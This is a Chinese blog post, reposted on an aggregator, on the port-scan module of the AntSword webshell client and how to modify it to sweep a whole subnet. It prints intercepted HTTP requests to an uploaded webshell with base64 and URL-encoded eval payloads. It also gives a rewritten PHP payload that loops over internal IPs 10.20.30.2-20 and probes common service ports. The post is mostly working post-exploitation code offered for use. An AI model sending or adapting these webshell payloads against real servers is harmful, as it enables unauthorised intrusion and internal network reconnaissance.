2. 程式人生 > 實用技巧 >蟻劍埠掃描模組原理及修改批量掃C段埠

蟻劍埠掃描模組原理及修改批量掃C段埠

阿新 發佈:2020-12-11

問題:目前蟻劍的掃埠外掛,只能掃單個IP,不能批量C段掃埠,故抓包檢視原理。

原理:依然是eval去執行字串php程式碼。使用fsockopen去嘗試建立連線,如果成功則說明埠開放,否則則視為關閉。

給蟻劍新增代理:然後burp抓包:

原始包:test2020.php為上傳的指令碼

可以看到就是eval去執行命令,通過post去傳遞引數。同時也會發現蟻劍的UA特徵。

POST /test2020.php HTTP/1.1
Host: xxxxx.com
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1002
Connection: close

pass=@eval(@base64_decode($_POST[x48a65e2783111]));&x48a65e2783111=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiNmNjMWJiNzY5MCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiOTlmNTU5NTRiIjt9b2Jfc3RhcnQoKTt0cnl7CiAgICAgICAgZnVuY3Rpb24gcG9ydHNjYW4oJHNjYW5pcCwgJHNjYW5wb3J0PSI4MCIpewogICAgICAgICAgZm9yZWFjaChleHBsb2RlKCIsIiwgJHNjYW5wb3J0KSBhcyAkcG9ydCl7CiAgICAgICAgICAgICRmcCA9IEBmc29ja29wZW4oJHNjYW5pcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMSk7CiAgICAgICAgICAgIGlmKCEkZnApewogICAgICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgICBlY2hvICRzY2FuaXAuIgkiLiRwb3J0LiIJT3BlbgoiOwogICAgICAgICAgICAgIEBmY2xvc2UoJGZwKTsKICAgICAgICAgICAgfQogICAgICAgICAgfQogICAgICAgIH07DQpwb3J0c2NhbigiMTAuMTI0LjEzMi44IiwiMjEsMjIsMjMsMjUsODAsMTEwLDEzNSwxMzksNDQ1LDE0MzMsMzMwNiwzMzg5LDgwODAiKTsNCjt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

原始包解密:就是base64加密

POST /test2020.php HTTP/1.1
Host: xxxxxxxx.com:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1002
Connection: close

pass=@eval(@base64_decode($_POST[x48a65e2783111]));&x48a65e2783111=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "6cc1bb7690";echo @asenc($output);echo "99f55954b";}ob_start();try{
        function portscan($scanip, $scanport="80"){
          foreach(explode(",", $scanport) as $port){
            $fp = @fsockopen($scanip, $port, $errno, $errstr, 1);
            if(!$fp){
            }else{
              echo $scanip."	".$port."	Open
";
              @fclose($fp);
            }
          }
        };
portscan("10.20.30.8","21,22,23,25,80,110,135,139,445,1433,3306,3389,8080");
;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

去掉:base64_decode函式,然後再對載荷url編碼(防止特殊字元引起的問題),也可以執行:

POST /test2020.php HTTP/1.1
Host: xxxxxxxx.com:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 815
Connection: close

pass=%40eval($_POST[x48a65e2783111])%3b&x48a65e2783111=%40ini_set("display_errors",+"0")%3b%40set_time_limit(0)%3bfunction+asenc($out){return+$out%3b}%3bfunction+asoutput(){$output%3dob_get_contents()%3bob_end_clean()%3becho+"6cc1bb7690"%3becho+%40asenc($output)%3becho+"99f55954b"%3b}ob_start()%3btry{
++++++++function+portscan($scanip,+$scanport%3d"80"){
++++++++++foreach(explode(",",+$scanport)+as+$port){
++++++++++++$fp+%3d+%40fsockopen($scanip,+$port,+$errno,+$errstr,+1)%3b
++++++++++++if(!$fp){
++++++++++++}else{
++++++++++++++echo+$scanip."	".$port."	Open
"%3b
++++++++++++++%40fclose($fp)%3b
++++++++++++}
++++++++++}
++++++++}%3b
portscan("10.20.30.2","21,22,23,25,80,110,135,139,445,1433,3306,3389,8080")
%3b}catch(Exception+$e){echo+"ERROR%3a//".$e->getMessage()%3b}%3basoutput()%3bdie()%3b

對蟻劍掃描埠載荷進行修改

仔細觀察載荷部分可以對其進行修改,加個for迴圈就可以批量掃埠,但是因為會有請求超時限制,所以一次掃描的量控制在30左右。

對下面的payload進行url編碼就可以了

POST /test2020.php HTTP/1.1
Host: xxxxxxxx.com:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 860
Connection: close

pass=@eval($_POST[x48a65e2783111]);&x48a65e2783111=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "6cc1bb7690";echo @asenc($output);echo "99f55954b";}ob_start();try{
        function portscan($scanip, $scanport="80"){
          foreach(explode(",", $scanport) as $port){
            $fp = @fsockopen($scanip, $port, $errno, $errstr, 1);
            if(!$fp){
            }else{
              echo $scanip."	".$port."	Open
";
              @fclose($fp);
            }
          }
        };
for($x=2;$x<=20; $x++){       portscan("10.20.30.".$x,"21,22,23,25,80,110,135,139,445,1433,3306,3389,8080");}
;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

相關推薦

掃描模組原理修改批量C

問題:目前外掛,只能單個IP,不能批量C,故抓包檢視原理

python logging日誌模組原理操作解析

一、基本介紹 logging 模組是python自帶的一個包,因此在使用的時候,不必安裝,只需要import即可。

Python Subprocess模組原理例項

前言 其實有一個模組也支援執行系統命令,那個模組就是sys.system,但他執行系統命令會直接通過主程序去執行命令,那假如,該命令的執行需要耗費一個小時,那麼主程序會卡一個小時,而不會去幹別的事,這樣就會導致

Python openpyxl模組原理用法解析

這篇文章主要介紹了Python openpyxl模組原理用法解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

簡單瞭解python shutil模組原理使用方法

shutil --High-level file operations 高階的檔案操作模組 os模組提供了對目錄或者檔案的新建/刪除/檢視檔案屬性,還提供了對檔案以及目錄的路徑操作。比如說:絕對路徑,父目錄…… 但是,os檔案的操作還應該包含移

Python bisect模組原理常見例項

1. 模組介紹 1. bisect模組為內建標準庫,它實現了二分法查詢演算法(只要提到二分法查詢,應該優先想到此模組)

Python Mock模組原理使用方法詳解

一、mock是什麼? 英譯中含義有:虛假的; 不誠實的; 模仿的; 模擬的 這個意思

Python timeit模組原理使用方法

Python 中的 timeit 模組可以用來測試一程式碼的執行耗時,如一個變數賦值語句的執行時間,一個函式的執行時間等。

通過例項解析python subprocess模組原理用法

一、subprocess以及常用的封裝函式 執行python的時候,我們都是在建立並執行一個程序。像Linux程序那樣,一個程序可以fork一個子程序,並讓這個子程序exec另外一個程式。在Python中,我們通過標準庫中的subprocess包

Node.js fs模組原理常見用途

JavaScript 的是沒有操作檔案的能力,但是 Node 是可以做到的,Node 提供了操作檔案系統模組,是 Node 中使用非常重要和高頻的模組,是絕對要掌握的一個模組系統。

Socket原理實踐(Java/C/C++)

原理 基本概念 什麼是TCP/IP、UDP? 詳細的可以看一下這個:學習計算機網路知識只要一篇就夠了!

Python匯入模組原理相關注意事項

包的使用 1.首次匯入模組發生的事情3件事情 先產生一個執行檔案的名稱空間:

Spring @Enable模組驅動原理使用例項

Spring @Enable 模組概覽 框架實現 @Enable註解模組 啟用模組 Spring Framework @EnableWebMvc Web MVC 模組

Python模組zipfile原理使用方法詳解

zipfile是python裡用來做zip格式編碼的壓縮和解壓縮的,由於是很常見的zip格式,所以這個模組使用頻率也是比較高的

Python logging模組原理解析應用

一、logging日誌模組等級 常見log級別從高到低: CRITICAL 》ERROR 》WARNING 》INFO 》DEBUG,預設等級為WARNING,即>=WARNING級別的log才輸出。

Python壓縮模組zipfile實現原理用法解析

一、python壓縮模組簡介 python直接通過內建壓縮模組可以直接進行壓縮檔案的建立;

特徵性資訊修改簡單過WAF

0x00 前言 針對於的特徵,對於流量傳輸中WAF檢測的繞過, 打造武器庫, 進行合理化的修改,例如請求頭的偽造,流量的加密等一些常用功能,這邊主要進行 這幾部分的修改

Python threading模組condition原理執行流程詳解

Condition的處理流程如下: 首先acquire一個條件變數,然後判斷一些條件。 如果條件不滿足則wait;

Python自動化辦公Excel模組openpyxl原理用法解析

openpyxl 介紹 openpyxl 是一個直接可用於讀寫 xlsx 、xlsm、xltx、xltm 檔案的 Python 內建庫,藉助它可以利用 Python 語法對本地 xlsx 檔案進行自動化批量操作

NodeJS模組Buffer原理使用方法解析

Buffer 作為 nodejs 中重要的概念和功能,為開發者提供了操作二進位制的能力。本文記錄了幾個問題,來加深對 Buffer 的理解和使用: